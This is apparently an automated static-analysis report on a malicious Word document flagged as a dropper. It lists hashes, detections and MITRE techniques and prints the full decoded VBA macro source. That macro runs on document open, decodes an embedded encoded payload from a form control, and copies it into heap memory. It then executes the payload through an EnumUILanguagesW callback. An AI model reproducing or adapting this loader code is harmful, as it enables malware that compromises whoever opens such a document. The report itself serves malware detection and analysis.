Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1e4b3a644499bff0…

MALICIOUS

Office (OLE)

204.5 KB Created: 2016-10-06 16:14:00 Authoring application: Microsoft Office Word First seen: 2018-01-23
MD5: e5b10e5e73a796586c51448254c14949 SHA-1: fd0a0abf6c31ff0642cfd5f94a587d572e5dbacb SHA-256: 1e4b3a644499bff0de4b3879a18fb5f1ec62e3574ed4f176213ae51305fb34bf
90 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV with a critical heuristic firing for a dropper agent. The presence of VBA macros, specifically a Document_Open macro, indicates an attempt to automatically execute code upon opening. The VBA script itself appears to be obfuscated but contains elements suggesting it is designed to download and execute a second-stage payload, a common dropper behavior.

Heuristics 4

  • ClamAV: Doc.Dropper.Agent-6421647-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6421647-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    End Function
    Private Sub Document_Open()
    Dim escapist As Byte
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://ns.adobe.com/camera-raw-settings/1.0/In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
    • http://purl.org/dc/elements/1.1/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
    • http://www.iec.chIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12566 bytes
SHA-256: 3c24f99b406cdfc02b109689c0032b12329b60b80c46fa60c9bf1f73552445a4
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Dim fullhanded
Dim inspissate
Dim undernsong
Dim soupstrainer

Sub PrintForCall()
   Dim aDoc As ThisDocument
   For Each aDoc In Documents
      aDoc.Activate
   Next
End Sub

Function cimicidae(sugarplum, repellant)
Dim competitively As Variant
Dim handbarrow As Variant
inspissate = inspissate - 96
Dim frustrating As Integer
Dim sledder As Long
Dim corruption As Byte
Dim antimagnetic As String
Dim neckband As Long
ingredient sledder, ByVal VarPtr(repellant) + 8, 4
undernsong = undernsong / 388
neckband = sugarplum
For dulia = 15 To 66
bioclimatology = 66
fullhanded = soupstrainer
froelichia = "myo" & LCase$("glObin")
froelichia = LCase$("aP") & "hid"
Next dulia

ingredient ByVal neckband, ByVal sledder, 3299
soupstrainer = "costerman"
End Function
Sub podiatrist()
Dim fortuitous As Byte
Dim xanthomonad As Long
unrip = producing.byelaw.ControlTipText
reversibility = agglutination.anounce(unrip)
For aleut = 22 To 73
extravagance = 73
fullhanded = fullhanded
adenovirus = LCase$("SC") & LCase$("Up")
adenovirus = UCase$("RE") & UCase$("FUsE")
Next aleut

penthesilean = "perisher"
bites = "priestess"
#If Win64 Then
Dim patagonia As Variant
Dim diener As chaotically
Dim somatism As LongPtr
diener.header = 0
Dim pomade As Long
#Else
Dim oahu As String
diener = 0
Dim saimiri As Byte
Dim somatism As Long
#End If
haunt = 0
usherette = "bal"
alnashar = 4096
candleholder = 60
numerate = 75
If candleholder + numerate < 0 Then
candleholder = Left("unprcapital", 4) & UCase$("oNOuNcE") & UCase$("AbLe")
fullhanded = fullhanded
deft = Right$("valorousab", 2) & Left("iesdilatation", 3)
Else
inspissate = inspissate * 4
numerate = 38
End If

pertinacious = 79 - 13 + 94 + 261984
lathi = suffice(pertinacious, diener, diener)
somatism = istic(lathi, 0, 3299)
pelican = Mid("blockburjungian", 6, 3) & "gomas" & "ter"
Dim correctable As String
horometry = "concessionaire"
pagan = Mid("apatiteancquo", 8, 3) & UCase$("hORag") & Right$("nudgee", 1)
correctable = ravishing
influx = 55
chrysolite = 54
If influx + chrysolite < 36 Then
influx = Right$("attarcr", 2) & LCase$("IsTO") & Right$("bloodguiltybalite", 6)
soupstrainer = soupstrainer
impenitent = LCase$("Bl") & Left("indsamedeboue", 4)
Else
soupstrainer = "adynamic"
chrysolite = 2
End If

macrocosmic = reversibility
frost = "leontocebus"
cimicidae somatism, macrocosmic
sanctification = LCase$("CHE") & Left("eseboscience", 5) & LCase$("ARd")
#If Win64 Then
Dim catechize As String
conservancy = "compromise"
agglutinate = "ruddle"
exciseman = "cruse"
teachership = 105 + 471
#ElseIf (Win32) Then
teachership = 81 - 108 - 96 + 629 + 1698

#End If
Dim troupe As Long
Dim barry As Variant
Dim boise As Long
boise = 0
Dim flowmeter As Long
flowmeter = somatism + teachership
plucky = siren(flowmeter, boise, correctable)
For et = 33 To 71
avouch = 71
inspissate = undernsong + 481
hazards = LCase$("fe") & Left("ndrecohabitation", 4)
hazards = Left("cadecession", 2) & Mid("struthionidaeffeinealligation", 14, 6)
Next et

End Sub

Function ravishing()
Dim boutonniere As String
Dim herborist As Variant
For charades = 17 To 51
unhelpfully = 51
soupstrainer = soupstrainer
morphologically = Right$("gomphotheriidaemu", 2) & UCase$("mBLi") & Left("ngsexlimited", 2)
morphologically = Right$("lombardba", 2) & Mid("bawlckwacult", 5, 4) & Left("terenrich", 3)
Next charades

contending = ThisDocument.Path
ravishing = contending & "/" & ThisDocument.Name
End Function
Private Sub Document_Open()
Dim escapist As Byte
Dim polarimeter As Long
experimentist = LCase$("eq") & Mid("virginityuiprice", 10, 3)
mandrill = "gregorian"
podiatrist
For kites = 12 To 51
groggy = 51
soupstrainer = soupstrainer
fatherinlaw = LCase$("pe") & Mid("israelilagicmonoculous", 8, 5)
fatherinlaw = LCase$("SU") & Mid("bedouincklingcoherence", 8, 6)
Next kites
End Sub

Attribute VB_Name = "agglutination"
'The stress in life
'Life is gone
#If Win64 Then
'Let it all go and in time you will find
'Can't you see
Public Type chaotically
'I can't escape
'I'm not okay
header As LongPtr
'Life is gone
'The pressure seems to get me down
End Type
'Life is gone
'I can't escape
Public  Declare PtrSafe Function siren Lib "kernel32" Alias "EnumUILanguagesW" (ByVal lpEnumFunc As Any, ByVal flags As Any, lParam As Any) As LongPtr
'The pressure seems to get me down
'Numb me 'til I won't feel pain again
Public Declare PtrSafe Function cacus Lib "user32" Alias "GetDC" (ByVal conversationalist As LongPtr) As LongPtr
'I can't deal with your lies
'Poisons me with time
Public Declare PtrSafe Function arariba Lib "kernel32" Alias "RemoveDirectoryA" (acanthocephala As LongPtr)
'I am no one
'The pressure seems to get me down
Public Declare PtrSafe Function brachiopod Lib "user32" Alias "EndDialog" (ByVal city As LongPtr,nResult As LongPtr) As LongPtr
'I wish I could watch you drown and die
'They have said
Public Declare PtrSafe Function subvert Lib "kernel32" Alias "GetModuleHandle" (lpModuleName As LongPtr)
'I don't fit in
'I wish I could watch you drown and die
Public  Declare PtrSafe Sub ingredient Lib "ntdll" Alias "RtlMoveMemory" (affronterai As Any, punchinello As Any, ByVal gurgel As LongPtr)
'I can't escape
'I am no one
Public Declare PtrSafe Function anomalousness Lib "kernel32" Alias "TlsAlloc" () As LongPtr
'Poisons me with time
'I lost my mind
Public  Declare PtrSafe Function istic Lib "kernel32" Alias "HeapAlloc" (ByVal oropharynx As LongPtr, ByVal ameboid As  LongPtr, ByVal fences As LongPtr) As LongPtr
'Can't you see
'Let it all go and in time you will find
Public  Declare PtrSafe Function suffice Lib "kernel32" Alias "HeapCreate" (ByVal rattle As LongPtr,card As chaotically, magnetosphere As chaotically) As LongPtr
'I am no one
'Life has always been a problem

'And take my time
'Life is gone
#Else
'It's like a needle in my spine
'I am no one
Public Declare Function istic Lib "kernel32" Alias "HeapAlloc" (ByVal overcompensation As Long, ByVal backroom As Long, ByVal angelus As Long) As Long
'It stings inside
'Let it all go and in time you will find
Public Declare Function siren Lib "kernel32" Alias "EnumUILanguagesW" (ByVal lpEnumFunc As Any, ByVal atonement As Any, lParam As Any) As Long
'I don't fit in
'I don't fit in
Public Declare Function amenra Lib "kernel32" Alias "RemoveDirectoryA" (arminius As Long)
'And take my time
'I don't fit in
Public Declare Sub ingredient Lib "ntdll" Alias "RtlMoveMemory" (cooperate As Any, conscience As Any, ByVal jerrybuilder As Long)
'Let it all go and in time you will find
'Nothing is real and dies in the lies
Public Declare Function miscorrect Lib "user32" Alias "GetDC" (footprint As Long) As Long
'They have said
'I am no one
Public Declare Function quadrate Lib "kernel32" Alias "GetModuleHandle" (lpModuleName As Long)
'Life is gone
'Life is gone
Public Declare Function overwhelming Lib "user32" Alias "EndDialog" (ByVal eccentricity As Long, aviation As Long) As Long
'I wish I could watch you drown and die
'I don't fit in
Public Declare Function fuzzy Lib "kernel32" Alias "TlsAlloc" () As Long
'Life is gone
'Life is gone
Public Declare Function suffice Lib "kernel32" Alias "HeapCreate" (ByVal scarecrow As Long, ByVal retention As Long, ByVal catamount As Long) As Long
'I'm not okay
'I don't fit in

'Life is gone
'And take my time
#End If
'I don't fit in
'And take my time
Function sowbane(affrayment, counselorship)
sowbane = affrayment \ counselorship
End Function
Function halenia(bolete, buxus)
halenia = bolete And buxus
End Function
Function anounce(cockade) As String
Dim charitably As Long
Dim sabreur(255) As Byte
Dim aural(63) As Long
Dim hymenophyllaceae As Long
Dim commutability(63) As Long
Dim supernumernry(63) As Long
inspissate = undernsong And 443

Dim grisette() As Byte
Dim camarade As Integer

Dim gasman As Integer
fullhanded = fullhanded

Dim unsuccessfully As Long
Dim hunkpapa As Long

Dim pigeonhole As Long
Dim ovate() As Byte
Dim orbiculate As String
Dim downstage As Long

luckless = 57 + 4039
weapons = 23 + 56 + 6 + 65195
Dim coxcomical As Long

cricket = 64
blowfish = 124 + 67 + 261953
buglehorn = 100 - 120 + 83
Dim rez As Byte

auld = 103 + 94 + 118 + 257733
michigander = 61 + 117 + 114 + 3740
conspectuity = 125 + 38 + 97 - 5
backwoods = 75 - 71 + 252
Dim pallone As Variant

billboard = 16711680
prosternation = 16515072
arginine = 34 + 57 - 45 + 65490
Dim clavariaceae As Variant
Dim poker() As Byte
ReDim poker(4287)
absorbate = 4288
For i = 1 To absorbate
meow = Mid$(cockade, i, 1)
maidenhead = (Asc(meow))
brood = Right$("countshi", 2) & Right$("cablestri", 4) & Right$("hugonem", 4)
poker(i - 1) = maidenhead
Next
Dim cleaners As Integer
scolion = 3
While scolion < 8
scolion = scolion + 1
undernsong = undernsong + 418
Wend

hierarchically = UBound(poker)
hopsacking = 35
For crackdown = 0 To hierarchically
poker(crackdown) = poker(crackdown) + 2
Next crackdown
For serene = 3 To 57
lombardy = 57
inspissate = inspissate \ 391
sapient = Mid("electriciandetinsanely", 12, 3) & UCase$("RimeNtAl")
sapient = Right$("balkinessjo", 2) & Mid("breechclothnahlycaena", 12, 3)
Next serene

gasman = 0
scholarship = 122
baal = 255
For unsuccessfully = 0 To baal
Select Case unsuccessfully
Case 65 To 90
sabreur(unsuccessfully) = unsuccessfully - 65
Case 97 To scholarship
sabreur(unsuccessfully) = unsuccessfully - 71
Case 48 To 57
sabreur(unsuccessfully) = unsuccessfully + 8 - 127 + 123
Case 43
sabreur(unsuccessfully) = 62
Case 47
sabreur(unsuccessfully) = 63
End Select
Next unsuccessfully
For unsuccessfully = 0 To 63
supernumernry(unsuccessfully) = chasser(unsuccessfully, cricket)
aural(unsuccessfully) = chasser(unsuccessfully, luckless)
commutability(unsuccessfully) = chasser(unsuccessfully, blowfish)
Next unsuccessfully
wishes = 12
While wishes < 15
wishes = wishes + 1
inspissate = inspissate \ 55
Wend

grisette = poker
mongo = 12 - 54 - 76 + 122
ReDim ovate((((UBound(grisette) + 1) \ mongo) * 3) - 1)
For thistly = 41 To 51
sapling = 51
soupstrainer = "alchemic"
roadster = UCase$("De") & "mijo" & "ur"
roadster = "ap" & UCase$("hAKI") & UCase$("a")
Next thistly

wronged = 56 - 42 + 7 - 18
fullhanded = soupstrainer

inspissate = undernsong / 132

begum = wronged + 1
aepyorniformes = 31 - 32 + 3
For hymenophyllaceae = 0 To UBound(grisette) Step begum
coexistence = grisette(hymenophyllaceae)
pigeonhole = commutability(sabreur(coexistence)) _
 + aural(sabreur(grisette(hymenophyllaceae + 1))) + supernumernry(sabreur(grisette(hymenophyllaceae + 2))) + sabreur(grisette(hymenophyllaceae + wronged))
unsuccessfully = halenia(pigeonhole, billboard)
ovate(charitably) = sowbane(unsuccessfully, arginine)
unsuccessfully = halenia(pigeonhole, weapons)
ovate(charitably + 1) = sowbane(unsuccessfully, backwoods)
ovate(charitably + aepyorniformes) = halenia(pigeonhole, conspectuity)
charitably = charitably + aepyorniformes + 1
Next hymenophyllaceae
anounce = ovate
End Function

Function chasser(courageous, acception)
chasser = courageous * acception
End Function

Sub TemplatesDoChange()
    Dim CurDoc As Document
    Do While strCurDoc <> ""
         Set CurDoc = Documents.Open(FName:=strDocPath & strCurDoc)
        CurDoc.AttachedTemplate = strTemplateB
        CurDoc.Close wdSaveChanges
        strCurDoc = Dir
    Loop
End Sub



Attribute VB_Name = "producing"
Attribute VB_Base = "0{D49F5CA7-F1C1-4117-A68E-D10E8F1924EC}{A7C12257-AF1F-469E-A10E-A5E77398E32D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "whitish"
Attribute VB_Base = "0{DCB58BD7-81CC-4FEE-8775-9A9A830BD59C}{0A3CA1CA-8CEC-4FD5-B377-2ABB5C8EDFCD}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False